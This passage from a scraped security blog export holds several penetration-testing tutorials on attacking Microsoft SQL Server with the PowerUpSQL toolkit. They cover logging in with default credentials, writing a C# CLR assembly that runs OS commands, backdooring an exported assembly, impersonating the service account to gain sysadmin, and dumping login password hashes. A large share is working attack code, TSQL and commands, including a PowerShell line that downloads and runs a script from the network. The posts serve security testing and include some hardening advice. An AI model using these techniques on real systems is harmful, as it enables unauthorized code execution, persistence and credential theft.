  2. Identify SQL Instances through LDAP queries, scanning activities, or other means.
  3. Cross reference the list of default instance names with the discovered instance names.
  4. Attempt to log into SQL Server instances that match using the associated default credentials. 😊 Tada!

Loading PowerUpSQL

PowerUpSQL can be loaded a quite a few different ways in PowerShell. Below is a basic example showing how to download and import the module from GitHub.
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
For more standard options visit https://github.com/NetSPI/PowerUpSQL/wiki/Setting-Up-PowerUpSQL. Also, for more download cradle options check out Matthew Green’s blog at https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html.

Command Example: Targeting with Broadcast Ping

After you’ve loaded PowerUpSQL, you can run the command below to discover SQL Server Instances on your current broadcast domain.
Get-SQLInstanceBroadcast -Verbose
As you can see, the command provides you with a list of SQL Server instances on your local network. To identify which of the SQL Instances are configured with default passwords you can pipe “Get-SQLInstanceBroadcast” to  “Get-SQLServerLoginDefaultPw” as shown below.
Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw -Verbose

Command Example: Targeting with LDAP Query

If you have domain credentials, or are already running on a domain system, you can also query Active Directory via LDAP for a list of registered SQL Servers with the command below. This can also be executed from a non-domain system using syntax from the PowerUpSQL Discovery Cheatsheet.
Get-SQLInstanceDomain -Verbose
Like the last example, you can simply pipe “Get-SQLInstanceDomain”  into “Get-SQLServerLoginDefaultPw” to identify SQL Server instances registered on the domain that are configured with default passwords.
Get-SQLInstanceDomain -Verbose | Get-SQLServerLoginDefaultPw -Verbose
The full list of SQL Server instance discovery functions supported by PowerUpSQL have been listed below.
Function Name Description
Get-SQLInstanceFile Returns SQL Server instances from a file. One per line.
Get-SQLInstanceLocal Returns SQL Server instances from the local system based on a registry search.
Get-SQLInstanceDomain Returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL service principal names. The function will default to the current user's domain and logon server, but an alternative domain controller can be provided. UDP scanning of management servers is optional.
Get-SQLInstanceScanUDP Returns SQL Server instances from UDP scan results.
Get-SQLInstanceScanUDPThreaded Returns SQL Server instances from UDP scan results and supports threading.
Get-SQLInstanceBroadcast Returns SQL Server instances on the local network by sending a UDP request to the broadcast address of the subnet and parsing responses.
I also wanted to note that there is a DBATools function called "Find-DbaInstance" that can be used for blind SQL Server instance discovery . It actually supports a few more discovery options than PowerUpSQL. Chrissy LeMaire already wrote a nice overview that can be found at https://dbatools.io/find-sql-instances/.

What does Get-SQLServerLoginDefaultPw look for?

Currently the “Get-SQLServerLoginDefaultPw” functions cover 41 application specific default SQL Server instances, users and passwords. I intentionally didn’t include instances named SQL Express or MSSQLSERVER, because I wanted to avoid account lockouts. The only time a login is attempted is when there is an instance match that is unique to the application deployment. For those who are curious, the current list of application specific instances has been provided below.
ACS CODEPAL MYMOVIES RTCLOCAL vocollect
ACT7 CODEPAL08 ECC SALESLOGIX VSDOTNET
AOM2 CounterPoint ECOPYDB SIDEXIS_SQL
ARIS CSSQL05 ECOPYDB SQL2K5
AutodeskVault CADSQL Emerson2012 STANDARDDEV2014
BOSCHSQL DHLEASYSHIP HDPS PCAMERICA
BPASERVER9 DPM HPDSS PRISM
CDRDICOM DVTEL INSERTGT TEW_SQLEXPRESS
VSQL EASYSHIP INTRAVET RMSQLDATA
If you see an instance name I'm missing let me know.  I'm more than happy to update the function. :)

Wrap Up

In conclusion, make sure to take a close look at the third party applications you deploy in your environment.  Hopefully this blog/tool will help security teams clean up default passwords associated with default SQL Sever instances.  Good luck and hack responsibly! [post_title] => Attacking Application Specific SQL Server Instances [post_excerpt] => This blog walks through how to quickly identify SQL Server instances used by 3rd party applications that are configured with default passwords using PowerUpSQL. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-application-specific-sql-server-instances [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:28:29 [post_modified_gmt] => 2023-03-16 14:28:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=8743 [menu_order] => 474 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [33] => WP_Post Object ( [ID] => 7812 [post_author] => 17 [post_date] => 2017-07-13 07:00:13 [post_date_gmt] => 2017-07-13 07:00:13 [post_content] => In this blog, I’ll be expanding on the CLR assembly attacks developed by Lee Christensen and covered in Nathan Kirk’s CLR blog series. I’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence.  I’ll also share a few new PowerUpSQL functions that can be used to execute the CLR attacks on a larger scale in Active Directory environments. Below is an overview of what will be covered.  Feel free to jump ahead:

What is a Custom CLR Assembly in SQL Server?

For the sake of this blog, we’ll define a Common Language Runtime (CLR) assembly as a .NET DLL (or group of DLLs) that can be imported into SQL Server.  Once imported, the DLL methods can be linked to stored procedures and executed via TSQL.  The ability to create and import custom CLR assemblies is a great way for developers to expand the native functionality of SQL Server, but naturally it also creates opportunities for attackers.

How do I Make a Custom CLR DLL for SQL Server?

Below is a C# template for executing OS commands based on Nathan Kirk’s work and a few nice Microsoft articles.  Naturally, you can make whatever modifications you want, but once you’re done save the file to "c:tempcmd_exec.cs".
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void cmd_exec (SqlString execCommand)
    {
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:WindowsSystem32cmd.exe";
        proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();

        // Create the record and specify the metadata for the columns.
        SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
        
        // Mark the beginning of the result set.
        SqlContext.Pipe.SendResultsStart(record);

        // Set values for each column in the row
        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());

        // Send the row back to the client.
        SqlContext.Pipe.SendResultsRow(record);
        
        // Mark the end of the result set.
        SqlContext.Pipe.SendResultsEnd();
        
        proc.WaitForExit();
        proc.Close();
    }
};
Now the goal is to simply compile "c:tempcmd_exec.cs" to a DLL using the csc.exe compiler. Even if you don’t have Visual Studio installed, the csc.exe compiler ships with the .NET framework by default. So, it should be on your Windows system somewhere. Below is a PowerShell command to help find it.
Get-ChildItem -Recurse "C:WindowsMicrosoft.NET" -Filter "csc.exe" | Sort-Object fullname -Descending | Select-Object fullname -First 1 -ExpandProperty fullname
Assuming you found csc.exe, you can compile the "c:tempcmd_exec.cs" file to a DLL with a  command similar to the one below.
C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempcmd_exec.cs

How Do Import My CLR DLL into SQL Server?

To import your new DLL into SQL Server, your SQL login will need sysadmin privileges, the CREATE ASSEMBLY permission, or the ALTER ASSEMBLY permission. Follow the steps below to register your DLL and link it to a stored procedure so the cmd_exec method can be executed via TSQL. Log into your SQL Server as a sysadmin and issue the TSQL queries below.
-- Select the msdb database
use msdb

-- Enable show advanced options on the server
sp_configure 'show advanced options',1
RECONFIGURE
GO

-- Enable clr on the server
sp_configure 'clr enabled',1
RECONFIGURE
GO

-- Import the assembly
CREATE ASSEMBLY my_assembly
FROM 'c:tempcmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;

-- Link the assembly to a stored procedure
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
GO
Now you should be able to execute OS commands via the “cmd_exec” stored procedure in the “msdb” database as shown in the example below.

When you’re done, you can remove the procedure and assembly with the TSQL below.
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly

How Do I Convert My CLR DLL into a Hexadecimal String and Import It Without a File?

If you read Nathan Kirk’s original blog series, you already know that you don’t have to reference a physical DLL when importing CLR assemblies into SQL Server. "CREATE ASSEMBLY" will also accept a hexadecimal string representation of a CLR DLL file. Below is a PowerShell script example showing how to convert your "cmd_exec.dll" file into a TSQL command that can be used to create the assembly without a physical file reference.
# Target file
$assemblyFile = "c:tempcmd_exec.dll"

# Build top of TSQL CREATE ASSEMBLY statement
$stringBuilder = New-Object -Type System.Text.StringBuilder 
$stringBuilder.Append("CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM `n0x") | Out-Null

# Read bytes from file
$fileStream = [IO.File]::OpenRead($assemblyFile)
while (($byte = $fileStream.ReadByte()) -gt -1) {
    $stringBuilder.Append($byte.ToString("X2")) | Out-Null
}

# Build bottom of TSQL CREATE ASSEMBLY statement
$stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Build create procedure command
$stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Create run os command
$stringBuilder.AppendLine("EXEC[dbo].[cmd_exec] 'whoami'") | Out-Null
$stringBuilder.AppendLine("GO") | Out-Null
$stringBuilder.AppendLine(" ") | Out-Null

# Create file containing all commands
$stringBuilder.ToString() -join "" | Out-File c:tempcmd_exec.txt
If everything went smoothly, the "c:tempcmd_exec.txt" file should contain the following TSQL commands. In the example, the hexadecimal string has been truncated, but yours should be much longer. ;)
-- Select the MSDB database
USE msdb

-- Enable clr on the server
Sp_Configure ‘clr enabled’, 1
RECONFIGURE
GO

-- Create assembly from ascii hex
CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM 
0x4D5A90000300000004000000F[TRUNCATED]
WITH PERMISSION_SET = UNSAFE 
GO 

-- Create procedures from the assembly method cmd_exec
CREATE PROCEDURE [dbo].[my_assembly] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [cmd_exec].[StoredProcedures].[cmd_exec]; 
GO 

-- Run an OS command as the SQL Server service account
EXEC[dbo].[cmd_exec] 'whoami' 
GO
When you run the TSQL from the "c:tempcmd_exec.txt"  file in SQL Server as a sysadmin the output should look like this:

PowerUpSQL Automation

If you haven’t used PowerUpSQL before you can visit the setup page here. I made a PowerUpSQL function call "Create-SQLFileCLRDll" to create similar DLLs and TSQL scripts on the fly. It also supports options for setting custom assembly names, class names, method names, and stored procedure names. If none are specified then they are all randomized. Below is a basic command example:
PS C:temp> Create-SQLFileCLRDll -ProcedureName “runcmd” -OutFile runcmd -OutDir c:temp
C# File: c:tempruncmd.csc
CLR DLL: c:tempruncmd.dll
SQL Cmd: c:tempruncmd.txt
Below is a short script for generating 10 sample CLR DLLs / CREATE ASSEMBLY TSQL scripts. It can come in handy when playing around with CLR assemblies in the lab.
1..10| %{ Create-SQLFileCLRDll -Verbose -ProcedureName myfile$_ -OutDir c:temp -OutFile myfile$_ }

How do I List Existing CLR Assemblies and CLR Stored Procedures?

You can use the TSQL query below to verify that your CLR assembly was setup correctly, or start hunting for existing user defined CLR assemblies. Note: This is a modified version of some code I found here.
USE msdb;
SELECT      SCHEMA_NAME(so.[schema_id]) AS [schema_name], 
            af.file_id,                          
            af.name + '.dll' as [file_name],
            asmbly.clr_name,
            asmbly.assembly_id,           
            asmbly.name AS [assembly_name], 
            am.assembly_class,
            am.assembly_method,
            so.object_id as [sp_object_id],
            so.name AS [sp_name],
            so.[type] as [sp_type],
            asmbly.permission_set_desc,
            asmbly.create_date,
            asmbly.modify_date,
            af.content                                           
FROM        sys.assembly_modules am
INNER JOIN  sys.assemblies asmbly
ON          asmbly.assembly_id = am.assembly_id
INNER JOIN  sys.assembly_files af 
ON         asmbly.assembly_id = af.assembly_id 
INNER JOIN  sys.objects so
ON          so.[object_id] = am.[object_id]
With this query we can see the file name, assembly name, assembly class name, the assembly method, and the stored procedure the method is mapped to.

You should see "my_assembly" in your results. If you ran the 10 TSQL queries generated from "Create-SQLFileCLRDll" command I provided earlier, then you’ll also see the associated assembly information for those assemblies.

PowerUpSQL Automation

I added a function for this in PowerUpSQL called “Get-SQLStoredProcedureCLR” that will iterate through accessible databases and provide the assembly information for each one. Below is a command sample.
Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Username sa -Password 'sapassword!' | Out-GridView
You can also execute it against all domain SQL Servers with the command below (provided you have the right privileges).
Get-SQLInstanceDomain -Verbose | Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Username sa -Password 'sapassword!' | Format-Table -AutoSize

Mapping Procedure Parameters

Attackers aren’t the only ones creating unsafe assemblies.  Sometimes developers create assemblies that execute OS commands or interact with operating system resources. As a result, targeting and reversing those assemblies can sometimes lead to privilege escalation bugs. For example, if our assembly already existed, we could try to determine the parameters it accepts and how to use them.  Just for fun, let’s use the query below to blindly determine what parameters the “cmd_exec” stored procedure takes.
SELECT            pr.name as procname,
                        pa.name as param_name, 
                        TYPE_NAME(system_type_id) as Type,
                        pa.max_length, 
                        pa.has_default_value,
                        pa.is_nullable 
FROM             sys.all_parameters pa
INNER JOIN         sys.procedures pr on pa.object_id = pr.object_id
WHERE             pr.type like 'pc' and pr.name like 'cmd_exec'
In this example, we can see that  it only accepts one string parameter named "execCommand". An attacker targeting the stored procedure may be able to determine that it can be used for OS command execution.

How Do I Export a CLR Assembly that Exists in SQL Server to a DLL?

Simply testing the functionality of existing CLR assembly procedures isn’t our only option for finding escalation paths. In SQL Server we can also export user defined CLR assemblies back to DLLs. 😊 Let’s talk about going from CLR identification to CLR source code! To start we’ll have to identify the assemblies, export them back to DLLs, and decompile them so they can be analyzed for issues (or modified to inject backdoors).

PowerUpSQL Automation

In the last section, we talked about how to list out CLR assembly with the PowerUpSQL command below.
Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Username sa -Password 'sapassword!' | Format-Table -AutoSize
The same function supports a "ExportFolder" option. If you set it, the function will export the assemblies DLLs to that folder. Below is an example command and sample output.
Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04SQLSERVER2014 -ExportFolder c:temp  -Username sa -Password 'sapassword!' | Format-Table -AutoSize
Once again, you can also export CLR DLLs on scale if you are a domain user and a sysadmin using the command below:
Get-SQLInstanceDomain -Verbose | Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRV04SQLSERVER2014 -Username sa -Password 'sapassword!' -ExportFolder c:temp | Format-Table -AutoSize
DLLs can be found in the output folder. The script will dynamically build a folder structure based on each server name, instance, and database name.

Now you can view the source with your favorite decompiler. Over the last year I’ve become a big fan of dnSpy.  After reading the next section you’ll know why.

How do I Modify a CLR DLL and Overwrite an Assembly Already Imported into SQL Server?

Below is a brief overview showing how to decompile, view, edit, save, and reimport an existing SQL Server CLR DLL with dnSpy. You can download dnSpy from here. For this exercise, we are going to modify the cmd_exec.dll exported from SQL Server earlier.
  1. Open the cmd_exec.dll file in dnSpy. In the left panel, drill down until you find the “cmd_exec” method and select it. This will immediately allow you to review the source code and start hunting for bugs.

  2. Next, right-click the right panel containing the source code and choose "Edit Method (C#)…".

  3. Edit the code how you wish. However, in this example I added a simple "backdoor" that adds a file to the "c:temp" directory every time the "cmd_exec" method is called. Example code and a screen shot are below.
    [SqlProcedure]
    public static void cmd_exec(SqlString execCommand)
    {
        Process expr_05 = new Process();
        expr_05.StartInfo.FileName = "C:WindowsSystem32cmd.exe";
        expr_05.StartInfo.Arguments = string.Format(" /C {0}", execCommand.Value);
        expr_05.StartInfo.UseShellExecute = true;
        expr_05.Start();
        expr_05.WaitForExit();
        expr_05.Close();
        Process expr_54 = new Process();
        expr_54.StartInfo.FileName = "C:WindowsSystem32cmd.exe";
        expr_54.StartInfo.Arguments = string.Format(" /C 'whoami > c:tempclr_backdoor.txt", execCommand.Value);
        expr_54.StartInfo.UseShellExecute = true;
        expr_54.Start();
        expr_54.WaitForExit();
        expr_54.Close();
    }
  4. Save the patched code by clicking the compile button. Then from the top menu choose File, Save Module….  Then click ok.

According to this Microsoft article, every time a CLR is compiled, a unique GUID is generated and embedded in the file header so that it’s possible to "distinguish between two versions of the same file".  This is referred to as the MVID (module version ID). To overwrite the existing CLR already imported into SQL Server, we’ll have to change the MVID manually. Below is an overview.
  1. Open “cmd_exec” in dnspy, if it’s not already open. Then drill down into the PE sections and select the “#GUID” storage stream. Then, right-click on it and choose “Show Data in Hex Editor”.

  2. Next, all you have to do is modify one of the selected bytes with an arbitrary value.

  3. Select File from the top menu and choose “Save Module…”.

PowerShell Automation

You can use the raw PowerShell command I provided earlier or you can use the PowerUPSQL command example below to obtain the hexadecimal bytes from the newly modified "cmd_exec.dll" file and generate the ALTER statement.
PS C:temp> Create-SQLFileCLRDll -Verbose -SourceDllPath .cmd_exec.dll
VERBOSE: Target C#  File: NA
VERBOSE: Target DLL File: .cmd_exec.dll
VERBOSE: Grabbing bytes from the dll
VERBOSE: Writing SQL to: C:UsersSSUTHE~1AppDataLocalTempCLRFile.txt
C# File: NA
CLR DLL: .cmd_exec.dll
SQL Cmd: C:UsersSSUTHE~1AppDataLocalTempCLRFile.txt
The new cmd_exec.txt should look some things like the statement below.
-- Choose the msdb database
use msdb
-- Alter the existing CLR assembly
ALTER ASSEMBLY [my_assembly] FROM 
0x4D5A90000300000004000000F[TRUNCATED]
WITH PERMISSION_SET = UNSAFE 
GO
The ALTER statement is used to replace the existing CLR instead of DROP and CREATE. As Microsoft puts it, “ALTER ASSEMBLY does not disrupt currently running sessions that are running code in the assembly being modified. Current sessions complete execution by using the unaltered bits of the assembly.” So, in summary, nothing goes boom.  The TSQL query execution should look something like the screenshot below.

To check if your code modification worked, run the "cmd_exec" stored procedure and verify that the "c:tempbackdoor.txt" file was created.

Can I Escalate Privileges in SQL Server using a Custom CLR?

The short answer is yes, but there are some unlikely conditions that must be met first. If your SQL Server login is not a sysadmin, but has the CREATE or ALTER ASSEMBLY permission, you may be able to obtain sysadmin privileges using a custom CLR that executes OS commands under the context of the SQL Server service account (which is a sysadmin by default). However, for that to be successful, the database you create the CLR assembly in, must have the 'is_trustworthy' flag set to '1' and the 'clr enabled' server setting turned on. By default, only the msdb database is trustworthy, and the 'clr enabled' setting is disabled. :P I’ve never seen the CREATE or ALTER ASSEMBLY permissions assigned explicitly to a SQL login. However, I have seen application SQL logins added to the 'db_ddladmin' database role and that does have the 'ALTER ASSEMBLY' permission. Note: SQL Server 2017 introduced the 'clr strict security' configuration. Microsoft documentation states that the setting needs to be disabled to allow the creation of UNSAFE or EXTERNAL assemblies.

Wrap Up

In this blog, I showed a few ways CLR assemblies can be abused and how some of the tasks such as exporting CLR assemblies can be done on scale using PowerUpSQL. It’s worth noting that all of the techniques shown can be logged and tied to alerts using native SQL Server functionality, but I’ll have to cover that another day. In the meantime, have fun and hack responsibly! PS: Don’t forget that all of the attacks shown can also be executed via SQL Injection with a little manual effort / automation.

References

[post_title] => Attacking SQL Server CLR Assemblies [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-sql-server-clr-assemblies [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:52:23 [post_modified_gmt] => 2021-06-08 21:52:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7812 [menu_order] => 498 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [34] => WP_Post Object ( [ID] => 7582 [post_author] => 17 [post_date] => 2017-05-23 07:00:59 [post_date_gmt] => 2017-05-23 07:00:59 [post_content] => In this blog, I outline common techniques that can be used to leverage the SQL Server service account to escalate privileges from a local administrator to a SQL Server sysadmin (DBA).  I also share a few PowerUpSQL functions that I worked on with Mike Manzotti (@mmanzo_) to perform SQL Server service account impersonation by wrapping Joe Bialek’s (@JosephBialek) wonderful Invoke-TokenManipulation function.

SQL Server Service Account Overview

At its core, SQL Server is just another Windows application.  In the case of SQL Server, every instance installs as a set of Windows Services that run in the background.  Each of those Windows services is configured to run with a Windows account.  The associated Windows account is then used for all interaction with the operating system. The primary Window service behind SQL Server is the “SQL Server (Instance)” service, which runs sqlservr.exe.  Typically, the instance name is baked into the service name. For the sake of illustration, here is what three instances installed on the same system looks like in the services.msc.

Img B B Ba F

SQL Server Service Account Types

SQL Server services can be configured with many types of Windows accounts.  Naturally the type of Windows account chosen can dramatically affects the impact in the event that a SQL Server is compromised. Below are some common service account types: So…impersonating the service account could potentially land you Domain Admin privileges.  However, that’s not the goal of today’s exercise. ;) If you only remember one thing from this blog it should be: Regardless of a SQL Server service account’s privileges on the operating system, it has sysadmin privileges in SQL Server by default. That is true of every SQL Server version (that I’m aware of). Now, let’s talk about how to get that sysadmin access as a local administrator or Domain Admin.

How do I impersonate the SQL Server Service Account?

Below are some common methods for impersonating SQL Server service accounts or acquiring their passwords if you have local or domain administrator privileges. Note: All the techniques focus on the operating system level. However, a local administrator could also obtain sysadmin privileges from a least privilege SQL Server login using SQL Server layer vulnerabilities. For those who are curious about what versions of SQL Server are affected by which techniques I’ve provided a list below:

How do I impersonate the SQL Server Service Account using PowerUpSQL?

Now that we’ve touched on the common techniques and tools, below are a few handy functions for impersonating the SQL Server service account with PowerUpSQL. Note: Once again, these functions just wrap around Joe Bialek's Invoke-TokenManipulation function.

Invoke-SQLImpersonateService

Invoke-SQLImpersonateService can be used to impersonate a SQL Server service account based on an instance name.  This can come in handy when you’re a local admin on a box and want to be able to run all the PowerUpSQL functions as a sysadmin against a local SQL Server instance. Below is a basic example.
  1. Log into the target system as a local or domain administrator. Then verify who you are.
    PS C:> whoami
    
    demoadministrator
  2. Next load the PowerShell module PowerUpSQL.
    PS C:> IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
  3. List the first available SQL Server instance on the local system.
    PS C:> Get-SQLInstanceLocal | Select-Object -First 1
    ComputerName       : MSSQLSRV04
    Instance           : MSSQLSRV04BOSCHSQL
    ServiceDisplayName : SQL Server (BOSCHSQL)
    ServiceName        : MSSQL$BOSCHSQL
    ServicePath        : "C:Program FilesMicrosoft SQL ServerMSSQL12.BOSCHSQLMSSQLBinnsqlservr.exe" -sBOSCHSQL
    ServiceAccount     : NT ServiceMSSQL$BOSCHSQL
    State              : Running
  4. Verify that the local administrator does not have sysadmin privileges on the local SQL Server instance using the Get-SQLServerInfo function.
    PS C:> Get-SQLServerInfo -Verbose -Instance MSSQLSRV04BOSCHSQL
    
    VERBOSE: MSSQLSRV04BOSCHSQL : Connection Success.
    
    ComputerName           : MSSQLSRV04
    Instance               : MSSQLSRV04BOSCHSQL
    DomainName             : DEMO
    ServiceProcessID       : 1620
    ServiceName            : MSSQL$BOSCHSQL
    ServiceAccount         : NT ServiceMSSQL$BOSCHSQL
    AuthenticationMode     : Windows and SQL Server Authentication
    Clustered              : No
    SQLServerVersionNumber : 12.0.4100.1
    SQLServerMajorVersion  : 2014
    SQLServerEdition       : Developer Edition (64-bit)
    SQLServerServicePack   : SP1
    OSArchitecture         : X64
    OsVersionNumber        : 6.2
    Currentlogin           : DEMOAdministrator
    IsSysadmin             : No
    ActiveSessions         : 1
    You should notice that the “CurrentLogin” is your current user account, and “IsSysadmin” is “No”.
  5. Impersonate the SQL Server service account for the target instance.
    PS C:> Invoke-SQLImpersonateService -Verbose -Instance MSSQLSRV04BOSCHSQL
    
    VERBOSE: MSSQLSRV04BOSCHSQL : DEMOadministrator has local admin privileges.
    VERBOSE: MSSQLSRV04BOSCHSQL : Impersonating SQL Server process:
    VERBOSE: MSSQLSRV04BOSCHSQL : - Process ID: 1620
    VERBOSE: MSSQLSRV04BOSCHSQL : - Service Account: NT ServiceMSSQL$BOSCHSQL
    VERBOSE: MSSQLSRV04BOSCHSQL : Successfully queried thread token
    VERBOSE: MSSQLSRV04BOSCHSQL : Successfully queried thread token
    VERBOSE: MSSQLSRV04BOSCHSQL : Selecting token by Process object
    VERBOSE: MSSQLSRV04BOSCHSQL : Done.
  6. Verify that the SQL Server service account for the target instance was successful by running the Get-SQLServerInfo command.
    PS C:> Get-SQLServerInfo -Verbose -Instance MSSQLSRV04BOSCHSQL
    
    VERBOSE: MSSQLSRV04BOSCHSQL : Connection Success.
    ComputerName           : MSSQLSRV04
    Instance               : MSSQLSRV04BOSCHSQL
    DomainName             : DEMO
    ServiceProcessID       : 1620
    ServiceName            : MSSQL$BOSCHSQL
    ServiceAccount         : NT ServiceMSSQL$BOSCHSQL
    AuthenticationMode     : Windows and SQL Server Authentication
    Clustered              : No
    SQLServerVersionNumber : 12.0.4100.1
    SQLServerMajorVersion  : 2014
    SQLServerEdition       : Developer Edition (64-bit)
    SQLServerServicePack   : SP1
    OSArchitecture         : X64
    OsMachineType          : ServerNT
    OSVersionName          : Windows Server 2012 Standard
    OsVersionNumber        : 6.2
    CurrentLogin           : NT ServiceMSSQL$BOSCHSQL
    IsSysadmin             : Yes
    ActiveSessions         : 1
    You should notice that the “CurrentLogin” is now the SQL Server service account, and “IsSysadmin” is now “Yes”.  At this point, any PowerUpSQL function you run will be in a sysadmin context. :)
  7. Once you're all done doing what you need to do, revert to your original user context with the command below.
    PS C:> Invoke-SQLImpersonateService -Verbose -Rev2Self
Below is a short demo video: [video width="720" height="774" mp4="https://www.netspi.com/wp-content/uploads/2017/05/PowerUpSQL-7-Escalating-Local-Admin-to-Sysadmin.mp4"][/video]

Invoke-SQLImpersonateServiceCmd

Below is an example showing how to quickly start a cmd.exe in the context of each SQL service account associated with the instance MSSQLSRV04BOSCHSQL.  It's a little silly, but it seems to be an effective way to illustrate risk around SQL Server service accounts during demos.
PS C:> Invoke-SQLImpersonateServiceCmd -Instance MSSQLSRV04BOSCHSQL

Note: The verbose flag will give you more info if you need it.

MSSQLSRV04BOSCHSQL - Service: SQL Full-text Filter Daemon Launcher (BOSCHSQL) - Running command "cmd.exe" as NT ServiceMSSQLFDLauncher$BOSCHSQL
MSSQLSRV04BOSCHSQL - Service: SQL Server Reporting Services (BOSCHSQL) - Running command "cmd.exe" as NT ServiceReportServer$BOSCHSQL
MSSQLSRV04BOSCHSQL - Service: SQL Server Analysis Services (BOSCHSQL) - Running command "cmd.exe" as NT ServiceMSOLAP$BOSCHSQL
MSSQLSRV04BOSCHSQL - Service: SQL Server (BOSCHSQL) - Running command "cmd.exe" as NT ServiceMSSQL$BOSCHSQL

All done.

When the function is done running you should have a cmd.exe window for each of the services.

Img B A Note: You can also set a custom command to run using the -Exec command.

Get-SQLServerPasswordHash

Mike Manzotti (@mmanzo_) was nice enough to write a great function for pulling SQL Server login password hashes. It can be quite handy during penetration tests when searching for commonly shared account passwords.  He also added a -migrate switch to automatically escalate to sysadmin if your executing against a local instance with local administrator privileges.
PS C:> Get-SQLServerPasswordHash -Verbose -Instance MSSQLSRV04BOSCHSQL -Migrate

VERBOSE: MSSQLSRV04BOSCHSQL : Connection Success.
VERBOSE: MSSQLSRV04BOSCHSQL : You are not a sysadmin.
VERBOSE: MSSQLSRV04BOSCHSQL : DEMOadministrator has local admin privileges.
VERBOSE: MSSQLSRV04BOSCHSQL : Impersonating SQL Server process:
VERBOSE: MSSQLSRV04BOSCHSQL : - Process ID: 1568
VERBOSE: MSSQLSRV04BOSCHSQL : - ServiceAccount: NT ServiceMSSQL$BOSCHSQL
VERBOSE: MSSQLSRV04BOSCHSQL : Successfully queried thread token
VERBOSE: MSSQLSRV04BOSCHSQL : Successfully queried thread token
VERBOSE: MSSQLSRV04BOSCHSQL : Selecting token by Process object
VERBOSE: MSSQLSRV04BOSCHSQL : Attempting to dump password hashes.
VERBOSE: MSSQLSRV04BOSCHSQL : Attempt complete.
VERBOSE: 3 password hashes recovered.

ComputerName        : MSSQLSRV04
Instance            : MSSQLSRV04BOSCHSQL
PrincipalId         : 1
PrincipalName       : sa
PrincipalSid        : 1
PrincipalType       : SQL_LOGIN
CreateDate          : 4/8/2003 9:10:35 AM
DefaultDatabaseName : master
PasswordHash        : 0x0200698883dbec3fb88c445d43b99794043453384d13659ce72fc907af5a34534563c1624d935279f6447be9ec44467d4d1ef56d8e14a91fe183450520f560c2

[TRUNCATED]
Note: Mike also mentioned that it’s been working well remotely over WMI. :)

General Recommendations

Below are some basic recommendations that can be used to reduce the risk of the common escalation techniques outlined in this blog.
  • Upgrade to Windows Server 2012 or greater to support common OS controls.
  • Upgrade to SQL Server 2012 or greater to support common SQL Server controls.
  • Do not allow the storage of wdigest passwords in memory.
  • Do enable process protection.
  • Do use managed service accounts for standalone SQL Servers.
  • Do use least privilege domain accounts for clustered SQL Servers.
  • "Run separate SQL Server services under separate Windows accounts. Whenever possible, use separate, low-rights Windows or Local user accounts for each SQL Server service." For more information, see Configure Windows Service Accounts and Permissions.
  • Consider running endpoint protection that can identify common remote code injection techniques. *I am aware that nobody wants to put performance impacting software on a database server.  :)
  • More from Microsoft here
I would love to say “Simply remove the SQL Server service account from the Sysadmin fixed server role”, but I haven’t done enough testing to feel comfortable with that recommendation. As of right now it is a mystery to me why the service account is a sysadmin by default.  If anyone knows why, or has additional mitigating control recommendations please let me know.

Wrap Up

